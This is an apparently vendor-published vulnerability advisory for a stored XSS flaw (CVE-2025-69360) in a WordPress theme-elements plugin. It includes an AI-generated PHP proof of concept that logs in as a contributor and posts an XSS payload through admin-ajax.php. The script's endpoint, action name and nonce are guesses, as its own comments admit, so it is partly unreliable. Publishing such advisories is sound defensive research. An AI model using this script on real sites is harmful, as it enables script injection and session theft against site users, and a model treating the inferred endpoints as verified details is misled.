Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-69360: TheGem Theme Elements (for WPBakery) <= 5.11.0 – Authenticated (Contributor+) Stored Cross-Site Scripting (thegem-elements)

CVE ID CVE-2025-69360
Plugin thegem-elements
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 5.11.0
Patched Version
Disclosed January 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69360 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the TheGem Theme Elements plugin for WPBakery, affecting versions up to and including 5.11.0. Attackers with contributor-level or higher WordPress access can inject malicious scripts into pages. These scripts execute when users view the compromised pages. The CVSS 3.1 score of 6.4 (Medium severity) reflects its network accessibility, low attack complexity, and scope change impact.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping, as indicated by CWE-79. The vulnerability description explicitly states this cause. Without access to source code, we cannot confirm the exact vulnerable function or hook. The plugin likely fails to properly sanitize user-supplied input before storing it in the database and fails to escape that data before rendering it in a page. This pattern is common in WordPress plugins that handle custom post meta, shortcode attributes, or WPBakery/Elementor element parameters without using standard WordPress sanitization functions like `sanitize_text_field` or escaping functions like `esc_html`.

Exploitation requires an authenticated WordPress user with at least contributor-level privileges. Attackers likely inject XSS payloads through a plugin-specific input field, such as a WPBakery element parameter or a custom meta box. The payload would be stored in the post content or post meta. When the page loads, the unsanitized payload renders and executes in the victim’s browser. A realistic payload could be `` or a more sophisticated script stealing session cookies. The attack vector is a POST request to a WordPress admin endpoint, possibly `/wp-admin/admin-ajax.php` with an action parameter like `thegem_elements_action`, or a POST request to the post editor saving custom element data.

Remediation requires implementing proper input sanitization and output escaping. The patched version (5.11.1) likely added WordPress core sanitization functions (`sanitize_text_field`, `wp_kses_post`) to all user-controlled parameters before database storage. The fix also likely added output escaping functions (`esc_html`, `esc_attr`) when rendering those parameters in frontend or backend pages. For WPBakery integration, the plugin must validate and sanitize all shortcode attributes and element parameters. Atomic Edge analysis suggests the patch focused on the specific component handling user input for TheGem elements.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of a victim’s browser session. This can lead to session hijacking if cookies are stolen. Attackers could deface websites by injecting visible content. They could perform actions on behalf of authenticated users, potentially escalating privileges if an administrator views the malicious page. The stored nature means the payload executes for every visitor to the compromised page, amplifying impact. The vulnerability requires contributor-level access, limiting immediate exploitation to trusted users, but compromised contributor accounts or insider threats present real risk.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-69360 - TheGem Theme Elements (for WPBakery) <= 5.11.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
<?php
/**
 * Proof of Concept for CVE-2025-69360.
 * This script simulates an authenticated attacker with contributor privileges injecting a stored XSS payload.
 * The exact endpoint and parameters are inferred from the plugin slug and typical WPBakery integration patterns.
 * Assumptions:
 * 1. The vulnerability exists in a WPBakery element parameter handled by the plugin.
 * 2. The plugin processes AJAX requests or post saves without proper sanitization.
 * 3. Contributor-level users can edit posts/pages containing TheGem elements.
 */

$target_url = 'http://vulnerable-wordpress-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS - Contributor account
$password = 'contributor_password'; // CHANGE THIS
$payload = '<img src=x onerror=alert("Atomic_Edge_XSS")>'; // Basic XSS payload

// Step 1: Authenticate to WordPress and obtain cookies/nonce
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HEADER, true);
$response = curl_exec($ch);

// Step 2: Create a new post as contributor to inject XSS
// Contributor users can create posts but not publish them. We'll create a draft.
$create_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);

// Extract nonce for saving draft (pattern varies, using placeholder)
// In real exploitation, we would parse the HTML for the correct nonce and parameter names.
// This PoC assumes the vulnerability is in a custom field named 'thegem_element_param'.
$save_post_url = $target_url . '/wp-admin/admin-ajax.php';
$ajax_data = array(
    'action' => 'thegem_elements_save', // Inferred AJAX action based on plugin slug
    'post_id' => 'new', // Placeholder, would be actual post ID after creation
    'element_data' => $payload, // The unsanitized parameter
    'nonce' => 'placeholder_nonce' // Would need extraction from page
);

curl_setopt($ch, CURLOPT_URL, $save_post_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($ajax_data));
$response = curl_exec($ch);

echo "PoC executed. Check response for success indicators.n";
echo "If vulnerable, visiting the created post will trigger the XSS payload.n";

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School